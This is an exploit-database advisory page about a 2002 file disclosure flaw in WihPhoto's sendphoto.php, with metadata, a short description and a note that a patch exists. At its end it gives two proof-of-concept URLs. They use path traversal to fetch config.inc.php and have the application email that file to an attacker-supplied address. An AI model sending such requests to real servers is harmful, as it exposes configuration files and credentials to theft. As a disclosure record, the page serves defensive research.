header-logo
Suggest Exploit
vendor:
WihPhoto
by:
SecurityFocus
7.5
CVSS
HIGH
File Disclosure Vulnerability
200
CWE
Product Name: WihPhoto
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

WihPhoto File Disclosure Vulnerability

The vulnerability exists due to inadequate verification of some URI parameters in the sendphoto.php script file. An attacker can exploit this vulnerability and specify arbitrary files as the parameters to the variables. This will cause WihPhoto to send an email with the attacker-specified file as an attachment.

Mitigation:

The vendor has released a patch to address this issue. Users should upgrade to the latest version of WihPhoto.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6929/info

A vulnerability has been reported for WihPhoto that may result in the disclosure of files to remote attackers.

The vulnerability exists due to inadequate verification of some URI parameters in the sendphoto.php script file.

An attacker can exploit this vulnerability and specify arbitrary files as the parameters to the variables. This will cause WihPhoto to send an email with the attacker-specified file as an attachment. 


http://www.example.org/sendphoto.php?album=..&pic=config.inc.php
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1

Navigation

Suggest Exploit

Services By CQR